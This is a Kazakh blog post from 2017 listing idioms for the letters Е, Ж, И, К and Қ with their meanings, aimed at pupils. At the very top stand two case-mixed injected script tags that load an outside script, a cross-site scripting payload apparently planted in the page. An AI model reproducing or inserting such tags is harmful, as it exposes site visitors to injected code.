<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

19.11.2017

Тұрақты  тіркестер: Е, Ж, И, К, Қ

 

Екі өкпесін   қолына алу –

аяғы-аяғына жұқпау

Екі аяғын бір етікке тығу –

қысымға алу

Екі езуі екі құлағына жету –

қуану

Екі көзі төрт болды –

қорықты

(Бұл – кітапханаға баруға ерінетін

жалқау оқушыларға арналған пост)

Екі көзі шарасынан шығу

– қорқу

Екі қолынан демін алу –

болып, жетісіп отыру

Еңбегін сауды –

адал күн кешті

Еңсесі құру –

сағыну

Ер қаруы – бес қару – қылыш

найза, садақ, шоқпар, сойыл – ерлер асынып жүретін қарулар

Ереуіл атқа ер салу – елін

қорғануға асыну

Ернін шығарды – мазақтады

Ернінің емеурінін табу –

көңілін табу

Есек құрты мұртына түсу – баю

Етек-жеңін жию – есін жию

Етектен алу – кедергі жасау

Ешкімнің ала жібін аттамау –

қиянат жасамау

Жағадан алу – қылғындыру

Жағасын ұстау – таңдану

Жағы сембеді (тынбады) – көп

сөйледі

Жағына пышақ жанығандай – арық

Жайдың атқан тасындай – аса

құдіретті, мықты

Жалғанды жалпағынан басу –

молшылықта өмір сүру

Жанары кетті – көзінің нұры

кетті

Жанды жегідей жеу – қиналу

Жаны зәр түбіне жету – қорқу

Жаны сіріден жаралған екен –

мықты

Жанын қоярға жер таппау – әлек

болу

Жараның аузын алу – ескі дертті

еске түсіру

Жарғақ құлағы жастыққа тимеу –

тыным таппау

Жауырынан жел өту – азап шегу

Жегенін желкесінен шығару –

сазайын беру

Желкесін қасу – қысылу, сасу

Жеме-жемге келгенде – шешуші

сәтте

Жер астынан жік шықты, қос құлағы

тік шықты – табан астынан бәле шықты

Жер аяғы қиянда (ит өлген жер, ит

арқасы қиянда, жер түбі) – алыс

Жер болу – ұялу

Жер жұту – жоқ болу

Жер қабу – өлу

Жер қаптыру – алдау

Жетім қыздың тойындай – елеусіз

Жұлдызы оңынан туу – жолы болу

Жұмған аузын ашпау – сөйлемеу

Жұмыртқадан жүн қырыққан – қу

Жүз тайысу – ұрысу

Жүзі қайту – тайсалу

Жүзі солу – жүдеу

Жүзіктің көзінен өткендей

– сұлу

Жүн терісін сыпыру – өлімші

етіп сабау, азаптау

Жүндей түтті – әбден сабады

Жүрегі алып ұшты (жүрегі аузына

тығылды, жүрегі аттай тулады) – қатты толқыды

Жүрегінің түгі бар – батыр

Жүрісі сұйық – ісі мардымсыз

Жыл көрдің бе, ай көрдің бе? –

көп ұйықтағанға айтады

Жылан жалағандай – түк

қалдырмау

Жыланның басы қайту – аштығы

басылу

Жынынан айрылған бақсыдай – не

істерін білмеу, абдырап сасу

Жыртысын жырту – намысына

шапты, сойылын соқты, жоғын жоқтады, шашбауын көтерді

Жібі түзу – дұрыс адам

Жігері құм болу – шаршау, тауы

шағылу, жасып қалу

Жілігі шағылу – беті қайту

Зәрезап болу – жүрегі шайлығу,

үрейі ұшу

Зәрі қайту – уы тарқау

Зәріне міну – қаһарлану

Зығыры қайнау – ашулану

Иегі қышу – дәмелену

Ине шаншар жер жоқ – толық,

тығыз

Инемен құдық қазғандай – қиын,

ауыр

Инені жіпке тізу – бәле қуу

Иненің жасуындай – азғантай

Иненің көзінен өткендей – пысық

Ит арқасы құрысты – қайратқа

мінді

Ит байласа тұрғысыз – адам

тұрғысыз

Ит басына іркіт төгілу (ақ

түйенің қарны жарылу) – молшылық орнау

Ит болу – қор болу

Ит пен құстың арқасында – кім

көрінгеннің арқасында

Ит терісін басына қаптау –

ұрысу, балағаттау

Иттің қара тұмсығындай көру –

жек көру

Иттің құлы итақай – кім

көрінген, кез келген

Иығына су кету (иығы салбырау,

ұнжырғасы түсу, салысуға кету) – қажу, шаршау

Иығынан дем алу – мақтану

Иін тірескен – өте көп

Иісі мұрнына кірмейді – ештеңе

сезбеу

Кәдеге асу – іске жарау

Кәріне міну – ашулану

Кебін кию – аяғын құшу

Кежегесі кейін тарту –

жалқаулану

Кендірі кесілді – көтерем болу

Кең балақ, жалпы етек – қолынан

іс келмейтін, олақ

Кең дүние тар болу – дүниеден

түңілу

Кердең басу – талқандау

Кескен жерінен қан шықпас –

қатал, ұятсыз адам

Кеудесіне шайтан кіру – азу

Көз байлау – алдау

Көз болу – ие болу

Көз жазып қалу – адасу

Көз қиығын салу – көздің ұшымен

қарау

Көз салу – қарау

Көз сүзу – телміру

Көзі шалу– байқау, аңдау

Көзге сүйел болу – жеккөрінішті

көріну

Көзге түртсе көргісіз – қараңғы

Көзден ғайып болу – жоқ болу

Көзді ашып-жұмғанша – тез

Көздің жауын алу – қызықтыру

Көздің шырымын алу – аздап

ұйықтау

Көзі (қарасы) батты – біржола

жоқ болды

Көзі алақандай болу – қорқу

Көзі ашылу – санасы ояну

Көзі жету – кәміл сену

Көзі тою – көңілі тою

Көзіне топырақ шашу – жамандық

жасау

Көзіне шөп салу – алдау

Көк айыл (долы) – ашушаң

Көк ала қойдай ету – сабау, ұру

Көк өрім – бала кез

Көкейін тесу – көп құмарту

Көкесін таныту – ұрып-соғу

Көкірегі қарс айрылу – қайғыру,

өкіну

Көлденең сөз – жағымсыз қауесет

Көрпеңе қарай көсіл – әліңе

қара

Күлге аунаған түйедей – шаң-шаң

Кірерге тесік таппау – ұялу

Кірпігінен қырау тамған –

қаһарлы

Кірпідей жиырылу – жақтырмау

Кірпік қаққанша – тез

Кірпік қақпау – ұйықтамау

Кіршік шалу – ойына ақау түсу

Қабағы кірбің тартты – ренжіді

Қабағын қырау шалу – қартаю

Қабағын қақпау – тез

Қабақ шытысты – ұрысты

Қабырғамен кеңесті – жақын

кісілермен келісті, өз-өзімен ойласты

Қабырғасы қайысу – қатты қиналу

Қадалған жерінен қан алу

– дегенін істету

Қаймағы бұзылмау – бірлігі

бұзылмау

Қайрауы жеткен – бабына келген

Қақпанның қанды аузын басу –

қолға мықтап түсу

Қалпақтай ұшу – құлап түсу

Қалтасына сену – байлығына сену

Қан жалау – таяқ жеу

Қанат біту – қарқын алу

Қанатын жазу – белгілі болу

Қанатын қию – сорлату

Қанды балақ – озбыр

Қаны қайнау – ашулану

Қанына сіңу – әдеттену

Қанына тарту – туысына ұқсау

Қара есекке теріс мінгізу –

артына кір келтіру

Қара жаяу емес – құр алақан

емес

Қармаққа түсу – ұсталу

Қас пен көздің арасында – тез

Қас қарайғанда – кешқұрым

Қауқары кету – шаршау

Қиқу салды – дабыл қақты

Қой аузынан шөп алмас – момын

Қой үстіне бозторғай

жұмыртқалау – тыныштық заман орнау

Қойға шапқан қасқырдай –

тас-талқан ету

Қол арту – ниет ету

Қол байлау болу – кедергі жасау

Қол беру – келісу

Қол жалғау (қол ұшын беру) –

көмектесу

Қол қусыру – бағыну, көну

Қолтыққа су бүрікті –

желіктірді

Қолы ашық – жомарт

Қолы жүру – сәті келу

Қу маңдай – сорлы

Қу мойын – арық

Қу сирақ – қыдырымпаз

Қу тамақ – аш өзек, нәпсі

Қу таңдай – сөзуар адам туралы

мысқыл

Құлағы тесік – әр нәрседен

хабардар адам

Құлағын бұрау – үгіттеу

Құлағын түру – назар салу

Құлағына кірмеу – ұқпау

Құлағыңның тесігі бар ма, жоқ

па? – кереңбісің?

Құлаққағыс ету – айтар ойдың

ұшын шығару

Құлаққа ұрған танадай –

тып-тыныш

Құлаш сермеу – ұмтылу

Құнт қылмау – ескермеу

Құралайды көзге атқан – мерген

Құрғақ уәдемен қуырдақ қуыру –

алдау

Құрығы ұзын – билігі күшті

Қызыл өңеш – даукес, сөзуар

Қызыл сирақ – кедей

Қызыл сөз – бос сөз

Қызыл сөзден бал жағу – мадақтау

Қызыл тіл – шешен

Қылышынан қан таму – қатігез

Қырық құрау – тозған

Қырық пышақ – араздасқан

Қысқа жіп күрмеуге келмейді –

кедейлік

Қысқа қол – жетіспеушілік

Қысыр әңгіме – бос сөз

Қытығына тию – ашуландыру

 

 

 

 

 

 

 

Просмотров: 1164


Пікір қосу



Деректерді қолтаңбаға қосу
Текст